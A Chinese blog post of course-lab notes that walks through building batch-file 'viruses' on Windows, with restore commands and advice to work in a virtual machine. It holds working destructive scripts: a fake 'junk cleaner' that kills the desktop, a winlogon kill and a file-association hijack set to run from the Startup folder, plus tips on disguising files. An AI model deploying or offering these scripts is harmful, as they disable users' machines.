病毒制作实践小记：运行关机、蓝屏炸弹、进程关闭、拓展名病毒

叮嘟！这里是小啊呜的学习课程资料整理。好记性不如烂笔头，今天也是努力进步的一天。一起加油进阶吧！

一、前言

信息安全技术实践课之计算机病毒与黑客实验中相关实践小记。
建议所有相关操作都在虚拟机中完成。

希望这篇基础文章对大家有所帮助，更希望大家提高安全意识，学会相关防范，也欢迎大家讨论。

二、时间过程详细小记

1、关机bat脚本

关机bat脚本主要是调用“shutdown”实现关机。

其基本步骤如下：

新建文本文档
输入 shutdown -s -t 600
把txt改成bat

如下图所示，运行CMD可以查看shutdown命令的基本用法。

基本命令为：

shutdown -s -t 600
//现在让系统600秒之后关机

shutdown -a
//终止关闭计算机

实践步骤记录：

1、新建“test.bat”并填写“ shutdown -s -t 600”，某些系统需要在“文件夹选项”中，显示“隐藏已知文件类型的扩展名”。

把txt改成bat

2、双击BAT文件即运行关机。

运行结果如下图所示：

3、如果需要取消，还是在CMD黑框中输入“shutdown -a”命令。

2、最简单的蓝屏炸弹文件

这是一个伪装垃圾清理的批处理代码。

该命令是杀死进程：

“/im explorer.exe”表示要杀死的进程名称，关闭桌面；
“/f”表示强制杀死；“>nul”表示在屏幕上不要输出任何信息。

taskkill /im explorer.exe /f >nul 2>nul

完整代码如下所示，其中“Start c:\windows\expolrer.exe”表示继续开启桌面，“ping -n 5 127.0.0.1>nul”用于消耗时间。

TEST.bat

@echo off
title 系统垃圾清理
color 1f
echo 	=====若有杀毒软件恶意拦截，请选择【允许程序的所有操作】====
echo.
echo.
echo.
echo 	=====垃圾清理中，请不要关闭窗口=========
echo.
ping -n 5 127.0.0.1>nul
taskkill /im explorer.exe /f >nul 2>nul
echo.
echo 	=====拐了，你的系统已经废了=======
echo.
ping -n 5 127.0.0.1>nul
echo.
Start c:\windows\explorer.exe
echo.
echo 	=====已经修复好！是不是吓坏了！！O(∩_∩)O==========
pause

运行该批处理程序，桌面会消失，如下图所示。

过一会桌面又会恢复。

这里由于桌面设置了壁纸自动切换，所以不用在意壁纸的不同。

3、进程关闭病毒

相关步骤如下：

1、新建文本文档
2、输入：ntsd -c q -pn winlogon.exe，表示强制杀死进程
3、工具->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选
4、txt修改为bat
5、开始->程序->启动，打开game.bat文件

黑客很少攻击个人，一般攻击服务器，该命令对2003的服务器特别有杀伤力

双击之后，服务器直接蓝屏显示并重启。

关于ntsd

ntsd从Windows 2000开始就是系统自带的进程调试工具，在system32目录下。ntsd的功能非常的强大，用法也比较复杂，但如果只用来结束一些进程，那就比较简单了。

在Windows中只有System、SMSS.EXE和CSRSS.EXE不能杀。前两个是纯内核态的，最后那个是Win32子系统，ntsd本身需要它。lsass.exe也不要杀掉，它是负责本地账户安全的。被调试器附着的进程会随调试器一起退出，所以可以用来在命令行下终止进程。

打开cmd 后输入以下命令就可以结束进程：

方法一：利用进程的PID结束进程

命令格式：ntsd -c q -p pid

命令范例：ntsd -c q -p 1332 （结束explorer.exe进程）

范例详解：explorer.exe的pid为1332，但是如何获取进程的pid呢？

在CMD下输入TASKLIST就可以获取当前任务管理器所有进程的PID。

或者打开任务管理器，在菜单栏，选择“查看”->“选择列”，在打开的选择项窗口中将“PID（进程标识符）”项选择钩上，这样任务管理器的进程中就会多出PID一项了。PID的分配并不固定，是在进程启动是由系统随机分配的，所以进程每次启动的进程一般都不会一样。

方法二：利用进程名结束进程

命令格式：ntsd -c q -pn xxxx.exe （xxxx.exe 为进程名，exe不能省）

命令范例：ntsd -c q -pn explorer.exe

另外的能结束进程的DOS命令还有taskkill和tskill命令。

4、扩展名病毒

将文件格式修改或文档加密都是常见的病毒，比如永恒之蓝、勒索病毒等，它们就是将电脑内的所有资料、文档加密，当你要打开文件时，需要密码，此时通过比特币付费进行勒索。

扩展名病毒是将exe文件修改为txt文档。当遇到可执行的exe文件，会认为它是一个txt文档，用记事本打开，导致可执行程序运行不起来，这是就是这个病毒的原理。

相关步骤如下：

1、新建文本文档
2、增加代码：assoc.exe=txtfile
3、工具->文件夹选项->查看->“隐藏已知文件类型的扩展名”勾选
4、txt修改为bat
5、开始->程序->启动，打开bat文件
6、双击运行bat文件之后，我们的可执行文件就变成了txt文件。

此时系统认为exe就是txt程序，把系统的关联搞混乱了，它恢复起来很麻烦。

记得把文件放到启动菜单哦！

EXE程序打开如下图所示。

需要执行下面的命令还原exe文件。

assoc.exe=exefile

解决方法：

如果您不幸中了该病毒，怎么解决呢？如下图所示，还原所有正确关联即可。

assoc.txt=txtfile

效果如下图所示。

可怜的壁纸还是要重新设置啦！

拓展思考

其他所有文件格式都转换为txt文件，如下所示。此时，如果隐藏文件扩展名，甚至可以修改图标伪装成目标应用，当用户点击时会执行这些破坏；但由于不知道目标是否有隐藏文件扩展名，还是不建议这种“笨”方法。

assoc .htm=txtfile
assoc .dat=txtfile
assoc .com=txtfile
assoc .rar=txtfile
assoc .gho=txtfile
assoc .mvb=txtfile
...

三、小啊呜有话说

今天收获良多呀！

Ending！
更多课程知识学习记录随后再来吧！

就酱，嘎啦！

注：
1、人生在勤，不索何获。
2、病毒详解及批处理病毒制作详细文章参见：

https://blog.csdn.net/csdnnews/article/details/104322825